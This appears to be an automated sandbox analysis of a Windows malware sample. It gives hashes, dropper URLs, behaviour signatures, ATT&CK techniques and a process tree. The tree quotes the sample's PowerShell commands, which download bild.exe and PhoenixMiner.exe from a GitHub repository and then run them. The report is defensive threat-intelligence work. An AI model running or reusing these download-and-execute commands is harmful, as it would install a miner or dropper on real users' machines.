Analysis

  • max time kernel
    103s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220414-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-07-2022 21:28

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4744
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4176
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4464
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4848

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    b6deac3351c943410eafe90bc93687c8

    SHA1

    34ff10b6e186ff6f7b6f39ebb127ee137ade5589

    SHA256

    1775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a

    SHA512

    3e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
    Filesize

    53KB

    MD5

    079a33c4fee1c86c054b53ed3be615ba

    SHA1

    5e0380500c12f97740565c15d12f784fbc38b8f9

    SHA256

    d7c6ba965d23b558dc950644133250b327df98ab295aee49f81ee4420bafc6c7

    SHA512

    548d4bd900f53f3bff1c3bd4654cd1bdc1247d6ef9ea4b70e76120bbd7c1931d6129a306bcd29573c7324451c3cb98e68cfb3d97cc3a954df2170adc25aae619

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    091e2e8fbb17bbf54b7c650e34dc6c22

    SHA1

    a6b3b9ecd04aa49db3ad48bd030b3e441bce2c09

    SHA256

    9c6e83cd6015fea0f2c9bd84911121f3d6fe928d530ac44c4f97ba03ab48c448

    SHA512

    5a937969639cd5c7f746c35757f802595d1dad4292d2a837b93ddc7c990389cff351063a60ebf5f039c0b9b07ce933c2576dc7f44b764c1733a920ba30bcce33

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/4176-130-0x0000000000000000-mapping.dmp
  • memory/4464-136-0x0000000005F80000-0x0000000005FA2000-memory.dmp
    Filesize

    136KB

  • memory/4464-134-0x0000000003280000-0x00000000032B6000-memory.dmp
    Filesize

    216KB

  • memory/4464-138-0x00000000061C0000-0x0000000006226000-memory.dmp
    Filesize

    408KB

  • memory/4464-139-0x0000000006800000-0x000000000681E000-memory.dmp
    Filesize

    120KB

  • memory/4464-140-0x00000000079D0000-0x0000000007A66000-memory.dmp
    Filesize

    600KB

  • memory/4464-141-0x0000000006D00000-0x0000000006D1A000-memory.dmp
    Filesize

    104KB

  • memory/4464-142-0x0000000006D50000-0x0000000006D72000-memory.dmp
    Filesize

    136KB

  • memory/4464-143-0x0000000008060000-0x0000000008604000-memory.dmp
    Filesize

    5.6MB

  • memory/4464-144-0x0000000007C10000-0x0000000007C24000-memory.dmp
    Filesize

    80KB

  • memory/4464-133-0x0000000000000000-mapping.dmp
  • memory/4464-135-0x0000000005910000-0x0000000005F38000-memory.dmp
    Filesize

    6.2MB

  • memory/4464-137-0x00000000060E0000-0x0000000006146000-memory.dmp
    Filesize

    408KB

  • memory/4848-145-0x0000000000000000-mapping.dmp
  • memory/4848-149-0x0000000007390000-0x00000000073C2000-memory.dmp
    Filesize

    200KB

  • memory/4848-150-0x000000006F2F0000-0x000000006F33C000-memory.dmp
    Filesize

    304KB

  • memory/4848-151-0x0000000007370000-0x000000000738E000-memory.dmp
    Filesize

    120KB

  • memory/4848-152-0x0000000008430000-0x0000000008AAA000-memory.dmp
    Filesize

    6.5MB

  • memory/4848-153-0x00000000075A0000-0x00000000075AA000-memory.dmp
    Filesize

    40KB

  • memory/4848-154-0x0000000007750000-0x000000000775E000-memory.dmp
    Filesize

    56KB

  • memory/4848-155-0x00000000077A0000-0x00000000077BA000-memory.dmp
    Filesize

    104KB

  • memory/4848-156-0x0000000007790000-0x0000000007798000-memory.dmp
    Filesize

    32KB